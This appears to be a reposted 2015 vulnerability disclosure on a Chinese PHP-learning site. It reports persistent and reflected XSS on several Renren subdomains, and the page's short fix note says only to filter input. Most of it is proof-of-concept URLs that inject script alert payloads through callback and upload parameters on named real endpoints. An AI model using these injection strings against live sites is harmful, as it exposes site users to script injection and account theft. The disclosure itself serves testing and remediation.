网站地图    收藏   

主页 > 后端 > 网站安全 >

人人网两个持久型xss - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 13:02 作者: 阅读:

[导读] http://menexpert.renren.com/home.html再送两枚反射xsshttp://upload.renren.com/upload.fcgi?pagetype=addphotoflashhostid=259069614tick=994e56351beec4af07903b240a62b408block_index=0block_count=1u......

http://menexpert.renren.com/home.html
 
 
 




 
 
再送两枚反射xss
http://upload.renren.com/upload.fcgi?pagetype=addphotoflash&hostid=259069614&tick=994e56351beec4af07903b240a62b408&block_index=0&block_count=1&uploadid=fileIte"/><script>alert(/goderci/)</script>m7311161_1
 
http://interface.game.renren.com/restServer.php?method=Code.checkCode_jsonb&check_code=zdt9&callback=%22/%3E%3Cscript%3Ealert%28/goderci/%29%3C/script%3E
www.2cto.com
http://motodefy.renren.com/video.html#showdiv
 
 


 
再送两枚反射xss
http://base.yx.renren.com/RestAPI?method=api.base.getLoginUser&format=2&callback=%22/%3E%3Cscript%3Ealert%28/goderci/%29%3C/script%3E [IE6]
 
http://shine.yx.renren.com/service.do?template=api.com.login&format=jsonp&callback=jQu<script>alert(/goderci/)</script>ery17109305711311195436_1336037110832&_=1336037111387
 


修复方案:过滤

作者 goderci

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论